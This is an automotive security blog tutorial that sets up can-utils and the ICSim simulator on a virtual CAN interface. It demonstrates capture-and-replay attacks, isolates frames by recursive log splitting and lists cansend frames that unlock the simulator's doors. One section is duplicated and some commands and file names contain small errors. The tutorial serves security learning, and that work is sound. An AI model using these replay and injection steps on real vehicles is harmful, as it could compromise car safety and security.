Setting Up can-utils to Connect to CAN Devices
Welcome to the second post in our blog series on car penetration testing. In this post, we will explore how to set up and utilize the powerful can-utils tool to connect to CAN devices, monitor the network, and analyze the data flowing through it.
Before we dive into setting up can-utils, let’s take a quick look at the roadmap for this series:
Exploring the Inner Workings of the Controller Area Network (CAN) Bus Protocol: In the previous post, we discussed the basics of the CAN Bus protocol.
Setting Up can-utils to Connect to CAN Devices: (THIS POST) We will learn how to install and configure can-utils to interact with CAN devices and perform various tasks such as sending and receiving CAN packets.
Unraveling the Process of Reverse Engineering the CAN Bus: Reverse engineering is a crucial skill in car penetration testing. In this post, we’ll delve into the fascinating world of reverse engineering the CAN Bus, where we’ll analyze and understand the data exchanged between different components in a vehicle.
Venturing Into the Realm of ECU Hacking: Electronic Control Units (ECUs) are the brains behind various vehicle systems. In this post, we’ll explore the vulnerabilities that exist within ECUs and how to exploit them for hacking purposes. We’ll uncover techniques to gain control over these crucial components and potentially manipulate their behavior.
Through this exploration, my aim is to share practical knowledge about automotive cybersecurity. By the end of this series, you’ll have a solid foundation in car penetration testing, enabling you to identify vulnerabilities, understand potential attack vectors, and contribute to the ongoing efforts to secure vehicles in the digital age.
Now, let’s get started with setting up can-utils to connect to CAN devices.
Setting Up can-utils to Connect to CAN Devices
To connect to CAN devices using can-utils, you need to set up the necessary dependencies and configure the tools accordingly. Here’s a step-by-step guide on setting up can-utils on a Kali Linux instance:
Installing can-utils
First, you need to install the required libraries by running the following commands:
1
2
3
sudo apt install libsdl2 dev
sudo apt install libsdl2 image dev
sudo apt install can utils
Overview of can-utils
Once can-utils is installed and ready, let’s take a high-level look at some of the can-utils tools available:
- cangen: This command generates CAN packets and allows you to transmit them at specified intervals. It also has the capability to generate random packets.
- candump: This utility dumps CAN packets. You can apply filters and log packets using this tool.
- cansniffer: It is an interactive sniffer that groups packets by ID and highlights changed bytes.
- canplayer: This command replays packets saved in the standard SocketCAN “compact” format.
- cansend: This tool sends a single CAN frame to the CAN network.
Setting Up a Virtual CAN Network
If you don’t have physical CAN hardware for testing, you can set up a virtual CAN network. To do so, follow these steps:
Load the vcan module by running the command:
1
└─$ sudo modprobe vcan
When you check the dmesg output, you should see a message like this:
1
2
3
└─$ dmesg
[ 211.036166] CAN device driver interface
[ 211.036956] vcan: Virtual CAN interface driver
Proceed with the following commands:
1
2
└─$ sudo ip link add dev vcan0 type vcan
└─$ sudo ip link set up vcan0
To verify if the setup is successful, enter the command. If the output shows vcan0 with the flags UP,RUNNING,NOARP, you are ready to go:
1
2
3
4
5
6
7
└─$ ifconfig vcan0
vcan0: flags=193<UP,RUNNING,NOARP> mtu 72
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Seeing vcan0 in the output confirms that your virtual CAN network is set up correctly.
With can-utils installed and the CAN network configured, you are now ready to connect to CAN devices and utilize the various can-utils tools for the next few steps!
Simulating Realistic Background Noise with the Instrument Cluster Simulator
The instrument cluster simulator (ICSim) is a valuable software utility that generates essential CAN signals, creating a rich background of “normal” CAN noise. Its purpose is to provide a safe and convenient environment for practicing CAN bus reversing without the need to tinker with your actual car. The skills you develop using ICSim will directly translate to working with real vehicles, ensuring a smooth transition.
To get started, visit the ICSim GitHub repository at https://github.com/zombieCraig/ICSim and download the source code. Refer to the provided README file for instructions on how to compile the software. Follow the steps carefully to prepare for an effective learning experience.
Before launching ICSim, ensure that you have already set up a vcan0 interface using the setup_vcan.sh script mentioned in the README. If you haven’t done so, please refer to the previous step for guidance. This setup is necessary and straightforward.
1
2
3
4
5
└─$ cat setup_vcan.sh
sudo modprobe can
sudo modprobe vcan
sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0
Now, let’s explore ICSim! It consists of two components: icsim and controls, which communicate over a CAN bus. Begin by loading the instrument cluster onto the vcan device with the following command:
1
└─$ ./icsim vcan0 &
As ICSim starts running, you will witness the instrument cluster come alive on your screen. It will display turn signals, a speedometer, and a car image that represents the locking and unlocking of the car doors.
Initially, the ICSim application may not show any activity since it solely listens for CAN signals. To control the simulator, launch the CANBus Control Panel by executing the following command:
1
└─$ ./controls vcan0 &
The CANBus Control Panel, resembling a game controller, will appear on your screen. If you prefer, you can connect a USB game controller, which is supported by ICSim. Alternatively, you can operate the simulator using your keyboard.
Familiarize yourself with the primary controls on the CANBus Control Panel:
Accelerate (up arrow): Press this to increase the speedometer reading. Holding the key down will make the virtual vehicle go faster.
Turn (left/right arrows): Hold down the respective arrow key to activate the turn signals.
Lock (left shift), Unlock (right shift): This control requires pressing two buttons simultaneously. Hold down the left shift and press one of the buttons (A, B, X, or Y) to lock a corresponding door. Similarly, hold down the right shift and press a button to unlock a door. If you hold down the left shift and then press the right shift, it will unlock all the doors. Conversely, holding down the right shift and pressing the left shift will lock all the doors.
Arrange your screen to have both the ICSim and the CANBus Control Panel visible simultaneously. This way, you can observe their interaction. Ensure that the control panel is selected and ready to receive input. Experiment with the controls to observe the real-time response of ICSim. If you encounter any issues, make sure that the ICSim control window is selected and active.
With ICSim up and running, alongside the intuitive CANBus Control Panel, we are now equipped to explore the world of CAN bus reversing with confidence.
Dumping CAN Frames and Performing a Replay Attack
In this section, we will explore how to dump CAN frames using CAN utils tools and conduct a simple replay attack.
Once you have successfully set up ICSim as instructed in the previous section and verified its proper functioning, it’s time to capture and analyze the CAN bus traffic. You can achieve this by running the candump command with the vcan0 interface. Take a look at the example below:
1
2
3
4
5
6
7
┌──(kali㉿kali)-[/opt/ICSim]
└─$ candump vcan0
vcan0 1DC [4] 02 00 00 39
vcan0 183 [8] 00 00 00 0C 00 00 10 2D
vcan0 143 [4] 6B 6B 00 E0
...
vcan0 21E [7] 03 E8 37 45 22 06 01
Dumping CAN Frames and Performing a Replay Attack
In this section, we will explore how to dump CAN frames using CAN utils tools and conduct a simple replay attack.
Once you have successfully set up ICSim as instructed in the previous section and verified its proper functioning, it’s time to capture and analyze the CAN bus traffic. You can achieve this by running the candump command with the vcan0 interface. Take a look at the example below:
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[/opt/ICSim]
└─$ candump vcan0
vcan0 1DC [4] 02 00 00 39
vcan0 183 [8] 00 00 00 0C 00 00 10 2D
vcan0 143 [4] 6B 6B 00 E0
...
vcan0 21E [7] 03 E8 37 45 22 06 01
In the above output, you will notice an “interface” column, where it indicates “vcan0.” This signifies that we are capturing all the packets on the vcan0 interface. Next, there is a “message identifier” column, followed by the “size” column, which represents the size of the data in each frame. For example, “seven” indicates seven bytes of data, “four” represents four bytes of data, and “eight” signifies eight bytes of data. The following column displays the actual data, while the last column indicates the size of the data.
Now, using the candump tool, we will log the captured CAN packets to prepare for executing a replay attack. Run the following command:
1
2
3
└─$ sudo candump -l vcan0
Disabled standard output while logging.
Enabling Logfile 'candump-2023-05-19_024025.log
By executing the above command, we log the CAN packets and store them in a logfile named candump-2023-05-19_023210.log for later use.
To perform the replay attack, let’s utilize the canplayer tool. Execute the following command:
1
2
┌──(kali㉿kali)-[/opt/ICSim]
└─$ canplayer -I candump-2023-05-19_024025.log
Observing the ICSim, you will notice that the accelerometer is changing the speed, the turn signals are activating, and the doors are opening and closing. The replayed CAN packets effectively replicate the recorded actions.
In summary, by utilizing the candump and canplayer tools, we were able to capture CAN frames, log them, and subsequently execute a replay attack on the ICSim. This allows us to simulate and observe the desired actions on the instrument cluster, replicating the recorded CAN traffic.
Recursive Splitting Method for Finding CAN Frames
In this section, we will explore the Recursive Splitting Method to identify a specific CAN frame responsible for opening the ICSim back left door.
To begin, use the candump command to record the CAN frames when you open the back left door:
1
2
3
4
┌──(kali㉿kali)-[/opt/ICSim]
└─$ sudo candump -l vcan0
Disabled standard output while logging.
Enabling Logfile 'candump-2023-05-19_025921.log'
Executing the above command will log the CAN frames into a file named candump-2023-05-19_025921.log.
To determine the number of lines in the log file, use the wc command:
1
2
└─$ wc -l candump-2023-05-19_025921.log
16706 candump-2023-05-19_025921.log
From the output, we can see that the log file contains a total of 16,706 lines.
Next, we will split the log file into two halves using the split command:
1
2
3
4
5
6
7
8
9
10
└─$ sudo split -l 8500 candump-2023-05-19_025921.log split_door
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ ls -la
total 1452
drwxr-xr-x 2 root root 4096 May 19 03:03 .
drwxr-xr-x 6 root root 4096 May 19 03:01 ..
-rw-r--r-- 1 root root 736994 May 19 02:59 candump-2023-05-19_025921.log
-rw-r--r-- 1 root root 374938 May 19 03:03 split_dooraa
-rw-r--r-- 1 root root 362056 May 19 03:03 split_doorab
This command splits the log file into two separate files, namely split_dooraa and split_doorab.
To determine which of these files contains the CAN frame responsible for opening the door, we can use the canplayer command:
1
2
3
4
5
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ canplayer -I split_dooraa
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ canplayer -I split_doorab
Execute the above commands to play the CAN frames from each file and observe the result. Based on my specific example, the split_doorab file contains the CAN frame required to open the back left door.
Continuing with the recursive splitting method, we repeat the process by splitting the split_doorab file into smaller parts,Once again, we use canplayer to verify which file contains the desired CAN frame:
1
2
3
4
5
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ sudo split -l 4000 split_doorab split_door_2
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ canplayer -I split_door_2aa
At this point, the process is repeated, splitting the file further and analyzing the resulting parts until a smaller file size is achieved. This iterative approach involves verifying which file contains the relevant CAN frame.
For example:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ sudo split -l 500 split_door_2aa split_door_3
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ ls
candump-2023-05-19_025921.log split_door_2ac split_door_3ac split_door_3af split_dooraa
split_door_2aa split_door_3aa split_door_3ad split_door_3ag split_doorab
split_door_2ab split_door_3ab split_door_3ae split_door_3ah
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ canplayer -I split_door_4aj
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ wc -l split_door_4aj
50 split_door_4aj
Continue this process until you reach a file size that can be easily inspected. For instance:
1
2
3
4
5
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ sudo split -l 5 split_door_4aj split_door_5
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ canplayer -I split_door_5aa
From the final file obtained, such as split_door_5aa, you can examine the CAN frames it contains. To verify which CAN frame opens the back left door, you can use the cansend command:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ cat split_door_5aa
(1684479566.160076) vcan0 1B0#000F0000000157
(1684479566.160079) vcan0 1D0#000000000000000A
(1684479566.160118) vcan0 19B#00000B000000
(1684479566.160124) vcan0 244#000000017C
(1684479566.161172) vcan0 166#D0320027
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ cansend vcan0 1B0#000F0000000157
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ cansend vcan0 1D0#000000000000000A
┌──(kali㉿kali)-[/opt/ICSim/split]
└─$ cansend vcan0 19B#00000B000000
By sending these specific CAN frames, you can observe the corresponding action of the back left door opening.
Therefore, based on the iterative splitting process, it is determined that the CAN frame 19B#00000B000000 is responsible for opening the back left door of the car.
Find CAN frames by CAN Sniff Method for all controls
In this section, we will utilize the cansniffer tool to sniff CAN frames and identify various controls within the system.
Upon running the cansniffer tool, we can observe the changing packets highlighted in red. By closely monitoring these packets, we can determine which message identifiers correspond to specific controller actions.
To begin, let’s analyze the results from our previous attack. We discovered that the message identifier for door opening was 19B. Let’s continue our exploration from this point.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali㉿kali)-[/opt/ICSim]
└─$ cansniffer -c vcan0
06|ms | ID | data ... < vcan0 # l=20 h=100 t=500 slots=37 >
00013 | 039 | 00 39 .9
00009 | 095 | 80 00 07 F4 00 00 00 08 ........
00011 | 133 | 00 00 00 00 A7 .....
00011 | 136 | 00 02 00 00 00 00 00 2A .......*
00009 | 13A | 00 00 00 00 00 00 00 28 .......(
00009 | 13F | 00 00 00 05 00 00 00 2E ........
00011 | 143 | 6B 6B 00 D1 kk..
00009 | 158 | 00 00 00 00 00 00 00 19 ........
00009 | 161 | 00 00 05 50 01 08 00 1C ...P....
00011 | 164 | 00 00 C0 1A A8 00 00 04 ........
00010 | 166 | D0 32 00 18 .2..
00009 | 17C | 00 00 00 00 10 00 00 21 .......!
00011 | 183 | 00 00 00 0D 00 00 10 1D ........
00009 | 18E | 00 00 6B ..k
00011 | 191 | 01 00 10 A1 41 00 0B ....A..
00019 | 1A4 | 00 00 00 08 00 00 00 2F ......./
00020 | 1AA | 7F FF 00 00 00 00 68 2F ......h/
00020 | 1B0 | 00 0F 00 00 00 01 66 ......f
00020 | 1CF | 80 05 00 00 00 1E ......
00021 | 1DC | 02 00 00 1B ....
00038 | 21E | 03 E8 37 45 22 06 2F ..7E"./
00013 | 244 | 00 00 00 01 16 .....
00038 | 294 | 04 0B 00 02 CF 5A 00 2C .....Z.,
00103 | 305 | 80 26 .&
00099 | 309 | 00 00 00 00 00 00 00 A2 ........
00100 | 320 | 00 00 12 ...
00100 | 324 | 74 65 00 00 00 00 0E 1A te......
00098 | 333 | 00 00 00 00 00 00 1E .......
00100 | 37C | FD 00 FD 00 09 7F 00 1A ........
00248 | 405 | 00 00 04 00 00 00 00 0B ........
00266 | 40C | 02 36 32 32 39 53 30 39 .6229S09
00245 | 428 | 01 04 00 00 52 1C 01 ....R..
00266 | 454 | 23 EF 36 #.6
00999 | 5A1 | 96 00 00 00 00 00 62 3E ......b>
To further validate our findings, let’s simulate the action of opening the left two doors. We can observe that the message identifier 19B appears in the output, whereas it was absent in the previous code. From the output, we can see the sequence: 00 00 0A 00 00 00. Thus this CAN frame is used to open the left two doors of the car.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
95|ms | ID | data ... < vcan0 # l=20 h=100 t=500 slots=37 >
00014 | 039 | 00 0C ..
00009 | 095 | 80 00 07 F8 00 00 00 04 ........
00010 | 133 | 00 00 00 00 98 .....
00010 | 136 | 00 02 00 00 00 00 00 1B ........
00010 | 13A | 00 00 00 00 00 00 00 19 ........
00010 | 13F | 00 00 00 05 00 00 00 1F ........
00010 | 143 | 6B 6B 00 D1 kk..
00010 | 158 | 00 00 00 00 00 00 00 0A ........
00010 | 161 | 00 00 05 50 01 08 00 0D ...P....
00010 | 164 | 00 00 C0 1A A8 00 00 31 .......1
00011 | 166 | D0 32 00 18 .2..
00010 | 17C | 00 00 00 00 10 00 00 12 ........
00010 | 183 | 00 00 00 09 00 00 10 11 ........
00010 | 18E | 00 00 5C ..\
00010 | 191 | 01 00 10 A1 41 00 38 ....A.8
00096 | 19B | 00 00 0A 00 00 00 ......
00018 | 1A4 | 00 00 00 08 00 00 00 2F ......./
00020 | 1AA | 7F FF 00 00 00 00 68 2F ......h/
00020 | 1B0 | 00 0F 00 00 00 01 66 ......f
00019 | 1CF | 80 05 00 00 00 0F ......
00019 | 1DC | 02 00 00 0C ....
00040 | 21E | 03 E8 37 45 22 06 01 ..7E"..
00012 | 244 | 00 00 00 01 48 ....H
00040 | 294 | 04 0B 00 02 CF 5A 00 0E .....Z..
00104 | 305 | 80 08 ..
00098 | 309 | 00 00 00 00 00 00 00 84 ........
00099 | 320 | 00 00 30 ..0
00099 | 324 | 74 65 00 00 00 00 0E 38 te.....8
00101 | 333 | 00 00 00 00 00 00 3C ......<
00099 | 37C | FD 00 FD 00 09 7F 00 38 .......8
00296 | 405 | 00 00 04 00 00 00 00 29 .......)
00300 | 40C | 00 00 00 00 04 00 00 13 ........
00300 | 428 | 01 04 00 00 52 1C 2F ....R./
00300 | 454 | 23 EF 18 #..
01261 | 5A1 | 96 00 00 00 00 00 62 10 ......b.
We can verify this by running the command below:
1
2
┌──(kali㉿kali)-[/opt]
└─$ cansend vcan0 19B#00000A000000
Based on the observations and experiments, we have identified a list of commands that correspond to specific actions. These commands have been verified using the cansend tool:
- To open the back right door:
cansend vcan0 19B#000007000000 - To open the back left door:
cansend vcan0 19B#00000B000000 - To open the right two doors:
cansend vcan0 19B#000005000000 - To open the left two doors:
cansend vcan0 19B#00000A000000 - To close all doors:
cansend vcan0 19B#00000F000000 - To trigger a right turn signal:
cansend vcan0 188#020000000000 - To trigger a left turn signal:
cansend vcan0 188#010000000000
Feel free to experiment with these commands to control the various functions of the vehicle.
Conclusion
In conclusion, setting up can-utils and connecting to CAN devices is an essential step in car penetration testing. In this post, we learned how to install and configure can-utils on a Kali Linux instance, as well as explored some of the can-utils tools available.
We also discovered how to set up a virtual CAN network using the vcan module. Additionally, we explored the instrument cluster simulator (ICSim) and its role in simulating realistic background noise for practicing CAN bus reversing. We then delved into dumping CAN frames and performing a replay attack using the candump and canplayer tools.
Finally, we explored the Recursive Splitting Method to identify a specific CAN frame responsible for a particular action. By following these steps, we can gain valuable insights into the inner workings of CAN networks and improve our understanding of automotive cybersecurity. With this knowledge, we can contribute to securing vehicles in the digital age and effectively identify vulnerabilities and potential attack vectors.